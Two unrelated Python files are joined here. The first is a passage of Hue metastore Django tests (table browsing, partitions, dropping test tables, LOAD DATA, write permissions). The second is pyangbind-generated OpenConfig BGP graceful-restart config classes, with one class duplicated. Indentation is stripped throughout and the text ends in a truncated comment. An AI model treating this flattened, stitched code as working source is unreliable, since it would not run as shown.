# Default database should exist
response = self.client.get("/metastore/databases")
assert_true("default" in response.context["databases"])
# Table should have been created
response = self.client.get("/metastore/tables/")
assert_true("test" in response.context["tables"])
# Switch databases
response = self.client.get("/metastore/tables/default")
assert_true("test" in response.context["tables"])
# Should default to "default" database
response = self.client.get("/metastore/tables/not_there")
assert_true("test" in response.context["tables"])
# And have detail
response = self.client.get("/metastore/table/default/test")
assert_true("foo" in response.content)
assert_true("SerDe Library" in response.content, response.content)
# Remember the number of history items. Use a generic fragment 'test' to pass verification.
history_cnt = verify_history(self.client, fragment='test')
# Show table data.
response = self.client.get("/metastore/table/default/test/read", follow=True)
response = self.client.get(reverse("beeswax:api_watch_query_refresh_json", kwargs={'id': response.context['query'].id}), follow=True)
response = wait_for_query_to_finish(self.client, response, max=30.0)
# Note that it may not return all rows at once. But we expect at least 10.
results = fetch_query_result_data(self.client, response)
assert_true(len(results['results']) > 0)
# This should NOT go into the query history.
assert_equal(verify_history(self.client, fragment='test'), history_cnt, 'Implicit queries should not be saved in the history')
def test_describe_view(self):
resp = self.client.get('/metastore/table/default/myview')
assert_equal(None, resp.context['sample'])
assert_true(resp.context['table'].is_view)
assert_true("View" in resp.content)
assert_true("Drop View" in resp.content)
# Breadcrumbs
assert_true("default" in resp.content)
assert_true("myview" in resp.content)
def test_describe_partitions(self):
response = self.client.get("/metastore/table/default/test_partitions")
assert_true("Show Partitions (1)" in response.content, response.content)
response = self.client.get("/metastore/table/default/test_partitions/partitions", follow=True)
assert_true("baz_one" in response.content)
assert_true("boom_two" in response.content)
# Breadcrumbs
assert_true("default" in response.content)
assert_true("test_partitions" in response.content)
assert_true("partitions" in response.content)
# Not partitioned
response = self.client.get("/metastore/table/default/test/partitions", follow=True)
assert_true("is not partitioned." in response.content)
def test_browse_partitioned_table_with_limit(self):
# Limit to 90
finish = BROWSE_PARTITIONED_TABLE_LIMIT.set_for_testing("90")
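# set_for_testing returns a restore callable, invoked in the finally block
# below, so the limit change does not leak into other tests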
try:
response = self.client.get("/metastore/table/default/test_partitions")
assert_true("0x%x" % 89 in response.content, response.content)
assert_false("0x%x" % 90 in response.content, response.content)
finally:
finish()
def test_browse_partitions(self):
response = self.client.get("/metastore/table/default/test_partitions/partitions/0", follow=True)
response = self.client.get(reverse("beeswax:api_watch_query_refresh_json", kwargs={'id': response.context['query'].id}), follow=True)
response = wait_for_query_to_finish(self.client, response, max=30.0)
results = fetch_query_result_data(self.client, response)
assert_true(len(results['results']) > 0, results)
def test_drop_multi_tables(self):
hql = """
CREATE TABLE test_drop_1 (a int);
CREATE TABLE test_drop_2 (a int);
CREATE TABLE test_drop_3 (a int);
"""
resp = _make_query(self.client, hql)
resp = wait_for_query_to_finish(self.client, resp, max=30.0)
# Drop them
resp = self.client.get('/metastore/tables/drop/default', follow=True)
assert_true('want to delete' in resp.content, resp.content)
resp = self.client.post('/metastore/tables/drop/default', {u'table_selection': [u'test_drop_1', u'test_drop_2', u'test_drop_3']})
assert_equal(resp.status_code, 302)
def test_drop_multi_databases(self):
hql = """
CREATE DATABASE test_drop_1;
CREATE DATABASE test_drop_2;
CREATE DATABASE test_drop_3;
"""
resp = _make_query(self.client, hql)
resp = wait_for_query_to_finish(self.client, resp, max=30.0)
# Drop them
resp = self.client.get('/metastore/databases/drop', follow=True)
assert_true('want to delete' in resp.content, resp.content)
resp = self.client.post('/metastore/databases/drop', {u'database_selection': [u'test_drop_1', u'test_drop_2', u'test_drop_3']})
assert_equal(resp.status_code, 302)
def test_load_data(self):
"""
Test load data queries.
These require Hadoop, because they ask the metastore
about whether a table is partitioned.
"""
# Check that view works
resp = self.client.get("/metastore/table/default/test/load", follow=True)
assert_true('Path' in resp.content)
# Try the submission
self.client.post("/metastore/table/default/test/load", dict(path="/tmp/foo", overwrite=True), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace("LOAD DATA INPATH '/tmp/foo' OVERWRITE INTO TABLE `default`.`test`", query.query)
resp = self.client.post("/metastore/table/default/test/load", dict(path="/tmp/foo", overwrite=False), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace("LOAD DATA INPATH '/tmp/foo' INTO TABLE `default`.`test`", query.query)
# Try it with partitions
resp = self.client.post("/metastore/table/default/test_partitions/load", dict(path="/tmp/foo", partition_0="alpha", partition_1="beta"), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace(query.query, "LOAD DATA INPATH '/tmp/foo' INTO TABLE `default`.`test_partitions` PARTITION (baz='alpha', boom='beta')")
def test_has_write_access_frontend(self):
client = make_logged_in_client(username='write_access_frontend', groupname='write_access_frontend', is_superuser=False)
grant_access("write_access_frontend", "write_access_frontend", "metastore")
user = User.objects.get(username='write_access_frontend')
def check(client, assertz):
response = client.get("/metastore/databases")
assertz("Drop</button>" in response.content, response.content)
assertz("Create a new database" in response.content, response.content)
response = client.get("/metastore/tables/")
assertz("Drop</button>" in response.content, response.content)
assertz("Create a new table" in response.content, response.content)
check(client, assert_false)
# Add access
group, created = Group.objects.get_or_create(name='write_access_frontend')
perm, created = HuePermission.objects.get_or_create(app='metastore', action='write')
GroupPermission.objects.get_or_create(group=group, hue_permission=perm)
check(client, assert_true)
def test_has_write_access_backend(self):
client = make_logged_in_client(username='write_access_backend', groupname='write_access_backend', is_superuser=False)
grant_access("write_access_backend", "write_access_backend", "metastore")
grant_access("write_access_backend", "write_access_backend", "beeswax")
user = User.objects.get(username='write_access_backend')
resp = _make_query(client, 'CREATE TABLE test_perm_1 (a int);') # Only fails if we were using Sentry and won't allow SELECT to user
resp = wait_for_query_to_finish(client, resp, max=30.0)
def check(client, http_codes):
resp = client.get('/metastore/tables/drop/default')
assert_true(resp.status_code in http_codes, resp.content)
resp = client.post('/metastore/tables/drop/default', {u'table_selection': [u'test_perm_1']})
assert_true(resp.status_code in http_codes, resp.content)
check(client, [301]) # Denied
# Add access
group, created = Group.objects.get_or_create(name='write_access_backend')
perm, created = HuePermission.objects.get_or_create(app='metastore', action='write')
GroupPermission.objects.get_or_create(group=group, hue_permission=perm)
check(client, [200, 302]) # Ok
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
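# the generated classes below reference __builtin__.property and long
# unconditionally, so they are aliased here for Python 3 compatibility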
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/bgp/neighbors/neighbor/graceful-restart/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to graceful-restart
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__enabled",
"__restart_time",
"__stale_routes_time",
"__helper_only",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"neighbors",
"neighbor",
"graceful-restart",
"config",
]
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
YANG Description: Enable or disable the graceful-restart capability.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: Enable or disable the graceful-restart capability.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_restart_time(self):
"""
Getter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertised in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
return self.__restart_time
def _set_restart_time(self, v, load=False):
"""
Setter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_time() directly.
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertised in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..65535"]},
int_size=16,
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_time must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': ['0..4096']}), is_leaf=True, yang_name="restart-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__restart_time = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_time(self):
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_stale_routes_time(self):
"""
Getter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
YANG Description: An upper-bound on the time that stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
return self.__stale_routes_time
def _set_stale_routes_time(self, v, load=False):
"""
Setter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_stale_routes_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_stale_routes_time() directly.
YANG Description: An upper-bound on the time that stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """stale_routes_time must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="stale-routes-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=True)""",
}
)
self.__stale_routes_time = t
if hasattr(self, "_set"):
self._set()
def _unset_stale_routes_time(self):
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
def _get_helper_only(self):
"""
Getter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain its own
forwarding state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
return self.__helper_only
def _set_helper_only(self, v, load=False):
"""
Setter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_helper_only is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_helper_only() directly.
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain its own
forwarding state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """helper_only must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="helper-only", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__helper_only = t
if hasattr(self, "_set"):
self._set()
def _unset_helper_only(self):
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
enabled = __builtin__.property(_get_enabled, _set_enabled)
restart_time = __builtin__.property(_get_restart_time, _set_restart_time)
stale_routes_time = __builtin__.property(
_get_stale_routes_time, _set_stale_routes_time
)
helper_only = __builtin__.property(_get_helper_only, _set_helper_only)
_pyangbind_elements = OrderedDict(
[
("enabled", enabled),
("restart_time", restart_time),
("stale_routes_time", stale_routes_time),
("helper_only", helper_only),
]
)
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/bgp/neighbors/neighbor/graceful-restart/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to graceful-restart
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__enabled",
"__restart_time",
"__stale_routes_time",
"__helper_only",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"neighbors",
"neighbor",
"graceful-restart",
"config",
]
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
YANG Description: Enable or disable the graceful-restart capability.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: Enable or disable the graceful-restart capability.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_restart_time(self):
"""
Getter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertised in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
return self.__restart_time
def _set_restart_time(self, v, load=False):
"""
Setter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_time() directly.
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertised in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..65535"]},
int_size=16,
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_time must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': ['0..4096']}), is_leaf=True, yang_name="restart-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__restart_time = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_time(self):
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_stale_routes_time(self):
"""
Getter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
YANG Description: An upper-bound on the time that stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
return self.__stale_routes_time
def _set_stale_routes_time(self, v, load=False):
"""
Setter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_stale_routes_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_stale_routes_time() directly.
YANG Description: An upper-bound on the time that stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """stale_routes_time must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="stale-routes-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=True)""",
}
)
self.__stale_routes_time = t
if hasattr(self, "_set"):
self._set()
def _unset_stale_routes_time(self):
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
def _get_helper_only(self):
"""
Getter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain its own forwarding
state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
return self.__helper_only
def _set_helper_only(self, v, load=False):
"""
Setter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_helper_only is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_helper_only() directly.
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain its own forwarding
state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """helper_only must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="helper-only", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__helper_only = t
if hasattr(self, "_set"):
self._set()
def _unset_helper_only(self):
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
enabled = __builtin__.property(_get_enabled, _set_enabled)
restart_time = __builtin__.property(_get_restart_time, _set_restart_time)
stale_routes_time = __builtin__.property(
_get_stale_routes_time, _set_stale_routes_time
)
helper_only = __builtin__.property(_get_helper_only, _set_helper_only)
_pyangbind_elements = OrderedDict(
[
("enabled", enabled),
("restart_time", restart_time),
("stale_routes_time", stale_routes_time),
("helper_only", helper_only),
]
)
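# Hedged usage sketch (not part of the generated module): on an instance of
# this pyangbind-generated config class, the leaves defined above behave like
# plain attributes and are validated on assignment, e.g.:
#   cfg.enabled = True              # boolean leaf (YANGBool)
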